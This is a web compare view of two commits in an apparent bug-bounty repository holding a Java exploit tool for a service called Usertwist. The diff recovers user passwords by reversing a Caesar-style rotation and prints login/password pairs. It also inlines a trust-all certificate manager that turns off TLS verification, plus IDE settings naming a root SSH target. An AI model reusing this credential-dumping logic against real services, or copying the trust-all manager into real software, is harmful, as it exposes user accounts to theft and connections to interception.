Stage/bug-bounty-reports
4
0
Fork 0
Code Issues 3 Pull Requests Actions Packages Projects Releases 2 Wiki Activity

Compare commits

base: Stage:http_constructor
Branches Tags
Stage:main Stage:bot_exclusion Stage:virtual_threads Stage:without_bypass Stage:http_constructor Stage:new_caesar Stage:ssl_port Stage:dev Stage:script
Stage:enhanced-script Stage:script-release
..
compare: Stage:virtual_threads
Branches Tags
Stage:bot_exclusion Stage:virtual_threads Stage:without_bypass Stage:http_constructor Stage:new_caesar Stage:ssl_port Stage:dev Stage:script Stage:main
Stage:enhanced-script Stage:script-release

2 Commits
http_const ... virtual_th

Author SHA1 Message Date
Mateo
3aa13a9909 Implements virtual threads 2024-08-06 10:39:02 +02:00
Mateo
0142689374 Removed SSLBypass class 2024-08-06 08:48:07 +02:00
6 changed files with 87 additions and 47 deletions
Expand all files Collapse all files

6
.idea/git_toolbox_blame.xml generated Normal file
View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="GitToolBoxBlameSettings">
<option name="version" value="2" />
</component>
</project>

15
.idea/git_toolbox_prj.xml generated Normal file
View File

@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="GitToolBoxProjectSettings">
<option name="commitMessageIssueKeyValidationOverride">
<BoolValueOverride>
<option name="enabled" value="true" />
</BoolValueOverride>
</option>
<option name="commitMessageValidationEnabledOverride">
<BoolValueOverride>
<option name="enabled" value="true" />
</BoolValueOverride>
</option>
</component>
</project>

19
.idea/remote-targets.xml generated Normal file
View File

@@ -0,0 +1,19 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="RemoteTargetsManager">
<targets>
<target name="root@kyosu.fr:22" type="ssh/sftp" uuid="cb79b708-e728-4225-8df7-941abd57c841">
<config>
<option name="projectRootOnTarget" value="/root/Usertwist-Exploit" />
<option name="serverName" value="root@kyosu.fr:22 password" />
</config>
<ContributedStateBase type="JavaLanguageRuntime">
<config>
<option name="homePath" value="/opt/jdk-21.0.1" />
<option name="javaVersionString" value="17.0.11" />
</config>
</ContributedStateBase>
</target>
</targets>
</component>
</project>

10
src/fr/motysten/usertwist/exploit/tools/Parser.java
View File

@@ -15,18 +15,22 @@ public class Parser {
}
}
public static void asyncGetPass(JSONArray usersArray, int rotation) {
public static void asyncGetPass(JSONArray usersArray, int rotation) throws InterruptedException {
for (int i = 0; i < usersArray.length(); i++) {
int finalI = i;
new Thread(() -> {
Runnable r = () -> {
JSONObject user = usersArray.getJSONObject(finalI);
String login = user.getString("username");
String password = Cesar.rotate(user.getString("data"), rotation);
System.out.println((finalI + 1) + ". " + login + " => " + password);
}).start();
};
Thread t = Thread.startVirtualThread(r);
t.join();
}
}

41
src/fr/motysten/usertwist/exploit/tools/Request.java
View File

@@ -3,8 +3,11 @@ package fr.motysten.usertwist.exploit.tools;
import org.json.JSONObject;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLEngine;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509ExtendedTrustManager;
import java.io.IOException;
import java.net.Socket;
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
@@ -12,6 +15,7 @@ import java.net.http.HttpResponse;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.security.cert.X509Certificate;
import java.util.Map;
public class Request {
@@ -22,7 +26,42 @@ public class Request {
HttpClient.Builder builder = HttpClient.newBuilder();
if (insecure) {
SSLContext customContext = SSLContext.getInstance("TLS");
customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
customContext.init(null, new TrustManager[]{new X509ExtendedTrustManager() {
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
}
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
}
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) {
}
@Override
public X509Certificate[] getAcceptedIssuers() {
return new X509Certificate[0];
}
}}, new SecureRandom());
builder.sslContext(customContext);
}
this.client = builder.build();

43
src/fr/motysten/usertwist/exploit/tools/SSLBypass.java
View File

@@ -1,43 +0,0 @@
package fr.motysten.usertwist.exploit.tools;
import javax.net.ssl.SSLEngine;
import javax.net.ssl.X509ExtendedTrustManager;
import java.net.Socket;
import java.security.cert.X509Certificate;
public class SSLBypass extends X509ExtendedTrustManager {
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
}
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
}
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) {
}
@Override
public X509Certificate[] getAcceptedIssuers() {
return new X509Certificate[0];
}
}